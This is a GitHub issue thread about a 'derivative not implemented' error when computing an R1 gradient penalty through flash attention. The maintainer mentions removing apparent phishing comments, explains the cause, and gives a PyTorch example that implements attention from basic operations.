About R1 penalty - GitHub Issues

weleen commented 3 weeks ago

Hi,

Thank you for your excellent work. I am curious about the implementation of R1 regularization:

https://github.com/yhZhai/mcm/blob/392a6c6871a79bcb3d98141a4c1b4d61484c4dea/main.py#L1753

I got the following error:

[rank0]: Traceback (most recent call last):
[rank0]:   File "/home/yiming/.cursor-server/extensions/ms-python.debugpy-2024.8.0-linux-x64/bundled/libs/debugpy/_vendored/pydevd/pydevd.py", line 3489, in <module>
[rank0]:     main()
[rank0]:   File "/home/yiming/.cursor-server/extensions/ms-python.debugpy-2024.8.0-linux-x64/bundled/libs/debugpy/_vendored/pydevd/pydevd.py", line 3482, in main
[rank0]:     globals = debugger.run(setup['file'], None, None, is_module)
[rank0]:   File "/home/yiming/.cursor-server/extensions/ms-python.debugpy-2024.8.0-linux-x64/bundled/libs/debugpy/_vendored/pydevd/pydevd.py", line 2510, in run
[rank0]:     return self._exec(is_module, entry_point_fn, module_name, file, globals, locals)
[rank0]:   File "/home/yiming/.cursor-server/extensions/ms-python.debugpy-2024.8.0-linux-x64/bundled/libs/debugpy/_vendored/pydevd/pydevd.py", line 2517, in _exec
[rank0]:     globals = pydevd_runpy.run_path(file, globals, '__main__')
[rank0]:   File "/home/yiming/.cursor-server/extensions/ms-python.debugpy-2024.8.0-linux-x64/bundled/libs/debugpy/_vendored/pydevd/_pydevd_bundle/pydevd_runpy.py", line 321, in run_path
[rank0]:     return _run_module_code(code, init_globals, run_name,
[rank0]:   File "/home/yiming/.cursor-server/extensions/ms-python.debugpy-2024.8.0-linux-x64/bundled/libs/debugpy/_vendored/pydevd/_pydevd_bundle/pydevd_runpy.py", line 135, in _run_module_code
[rank0]:     _run_code(code, mod_globals, init_globals,
[rank0]:   File "/home/yiming/.cursor-server/extensions/ms-python.debugpy-2024.8.0-linux-x64/bundled/libs/debugpy/_vendored/pydevd/_pydevd_bundle/pydevd_runpy.py", line 124, in _run_code
[rank0]:     exec(code, run_globals)
[rank0]:   File "main_sfv.py", line 1541, in <module>
[rank0]:     main(args)
[rank0]:   File "main_sfv.py", line 1385, in main
[rank0]:     accelerator.backward(loss_disc_total)
[rank0]:   File "/home/yiming/anaconda3/envs/dmd2/lib/python3.8/site-packages/accelerate/accelerator.py", line 2011, in backward
[rank0]:     self.scaler.scale(loss).backward(**kwargs)
[rank0]:   File "/home/yiming/anaconda3/envs/dmd2/lib/python3.8/site-packages/torch/_tensor.py", line 521, in backward
[rank0]:     torch.autograd.backward(
[rank0]:   File "/home/yiming/anaconda3/envs/dmd2/lib/python3.8/site-packages/torch/autograd/__init__.py", line 289, in backward
[rank0]:     _engine_run_backward(
[rank0]:   File "/home/yiming/anaconda3/envs/dmd2/lib/python3.8/site-packages/torch/autograd/graph.py", line 768, in _engine_run_backward
[rank0]:     return Variable._execution_engine.run_backward(  # Calls into the C++ engine to run the backward pass
[rank0]: RuntimeError: derivative for aten::_scaled_dot_product_flash_attention_backward is not implemented

Do you have any idea how to fix this error?

weleen commented 3 weeks ago

Sorry, but your response doesn’t address the issue I raised here.

yhZhai commented 3 weeks ago

Hi there, I deleted some comments that seem to be phishing.

It seems that you used flash attention. Its fused kernel does not support the double backward (gradient of a gradient) that the R1 penalty requires, which caused this problem. Could you try the plain scaled_dot_product_attention instead?
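
For illustration, here is a minimal sketch of an R1 penalty computed through an attention layer built from basic ops, which autograd can differentiate twice. `TinyDiscriminator`, `plain_attention`, and `r1_penalty` are hypothetical names made up for this example and are not taken from the repository; the real discriminator and loss weighting will differ.

```python
import math

import torch
import torch.nn as nn


def plain_attention(q, k, v):
    """Attention from basic ops (matmul + softmax), so it supports double backward."""
    scores = q @ k.transpose(-2, -1) / math.sqrt(q.shape[-1])
    return torch.softmax(scores, dim=-1) @ v


class TinyDiscriminator(nn.Module):
    """Hypothetical stand-in for the real discriminator (illustration only)."""

    def __init__(self, dim=8):
        super().__init__()
        self.qkv = nn.Linear(dim, 3 * dim)
        self.head = nn.Linear(dim, 1)

    def forward(self, x):  # x: (batch, tokens, dim)
        q, k, v = self.qkv(x).chunk(3, dim=-1)
        pooled = plain_attention(q, k, v).mean(dim=1)
        return self.head(pooled).squeeze(-1)  # one logit per sample


def r1_penalty(disc, real):
    """Mean squared norm of d(logits)/d(real) over the batch."""
    real = real.detach().requires_grad_(True)
    logits = disc(real)
    # create_graph=True keeps the gradient itself differentiable.
    (grad,) = torch.autograd.grad(logits.sum(), real, create_graph=True)
    return grad.pow(2).flatten(1).sum(dim=1).mean()


torch.manual_seed(0)
disc = TinyDiscriminator()
penalty = r1_penalty(disc, torch.randn(4, 5, 8))
penalty.backward()  # second-order backward through the attention
```

If the model calls `torch.nn.functional.scaled_dot_product_attention` directly, wrapping the discriminator forward pass in `torch.nn.attention.sdpa_kernel(SDPBackend.MATH)` (available in recent PyTorch releases) should have a similar effect, at the cost of more memory and slower attention.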

yhZhai / mcm

About R1 penalty #11